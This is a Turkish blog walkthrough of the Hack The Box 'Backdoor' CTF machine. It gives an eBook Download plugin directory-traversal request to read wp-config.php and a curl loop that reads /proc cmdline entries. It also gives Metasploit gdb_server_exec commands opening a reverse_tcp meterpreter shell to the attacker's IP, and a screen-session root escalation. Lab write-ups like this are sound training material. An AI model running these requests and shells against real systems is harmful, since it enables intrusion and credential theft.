Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. CTF ÇÖZÜMLERİ
  4. »
  5. Hackthebox Backdoor Makine Çözümü

Hackthebox Backdoor Makine Çözümü

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 3 dk okuma süresi
207 0
Hackthebox Backdoor Makine Çözümü pp

Merhabalar bu yazımda  Hackthebox Backdoor Makine Çözümü sizlerle paylaşacağım. 

1- İlk olarak nmap taramasını yapıyorum ve 2 port açık olduğunu gördüm.

Ayrı olarak detaylı olarak tekrardan taradığımda 1337. portunda açık olduğunu tespit ettim. Toplam 3 portumuz açık.

Hackthebox Backdoor Makine Çözümü

2- Gobuster aracılığıyla tarama yaptım ama işe yarar bir şey bulamadım.

Hackthebox Backdoor Makine Çözümü

3-  Hedef web sitesinde WordPress CMS kullandığını keşfettim. Wpscan aracılığıyla tarayarak açık bulmaya çalışıyorum.

Detaylı olarak baktığımda eski bir versiyon veya güvenlik açığı bulamadım. Buradan sonra manuel olarak araştırmaya devam edeceğim.

İlginizi çekebilecek yazımız: Hackthebox Arctic Çözümü

Hackthebox Backdoor Makine Çözümü

4- Eklentileri tekrardan baktım e-book eklentisinin aktif olduğunu gördüm. Readme.txt içerisinden eklenti versiyonunu tespit ederek exploit bulabiliriz.

Hackthebox Backdoor Makine Çözümü

5- 1.1 sürümü olduğunu gördüm. Araştırdığımda LFI açığı olduğunu ve exploit-db üzerinde nasıl kullanıldığına bakıyorum.

6-  Buradaki uzantı yolunu alıp site üzerinde deneyip veri tabanı bilgilerini ele geçirmiş oluyoruz.

WordPress Plugin eBook Download 1.1 – Directory Traversal

7- İndirdim ve direkt olarak wp-config.php elimizde. Detaylı olarak yine araştırmalar yapsam da kullanıcıları araştırdığımdaysa sadece user kullanıcısını olduğunu tespit ettim.

Buradan da bir şey çıkmadı tekrardan 1337 porta dönüp araştırmaya devam ediyorum.

8- for i in {800..900}; do curl -s http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/$i/cmdline --output - | tr '\000' ' '| sed 's/<script>window.close()<\/script>/\n/g';  done

Proc üzerinden cmdline içerisinden araştırma yapmaya devam ediyorum.

Dikkatli baktığımızda gdb server olduğunu gördüm metasploit üzerinden yetki yükseltmeye çalışacağım.

Proc 800 ve Proc 802 de nasıl root içerisine geçiş yapabileceğimizi de direkt olarak görebiliyoruz. Bu yetki yükseltmede bize büyük bir avantaj sağlayacak.

9- Msfconsole yazarak açıyoruz ve sıra sıra yazabilirsiniz. Gdb_server_exec exploit ile makine içerisine geçiş yapacağız.

  • use exploit/multi/gdb/gdb_server_exec
  • set payload linux/x64/meterpreter/reverse_tcp
  • set lhost kendi vpn ip adresiniz
  • set rhosts 10.10.11.125
  • set rport 1337
  • set target 1
  • exploit

10- Shell yazarak aktif ettik.

python3 -c “import pty;pty.spawn(‘/bin/bash’)” direkt olarak bash kabuğunu açıyoruz.

cat user.txt ile ilk bayrağımızı bulduk.

11- 8. maddede yetki yükseltme için Proc çıktıları üzerinden görmüştük.

  • export TERM=xterm
  • /usr/bin/screen -x /root/root

Direkt root içerisine geçiş yaptık.

12- İd olarak baktığımızda root içerisindeyiz.

Yine cat root.txt yaparak son bayrağı da bulduk.

Hackthebox Backdoor Makine Çözümü yazımızın sonuna geldik, keyifli okumalar..

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir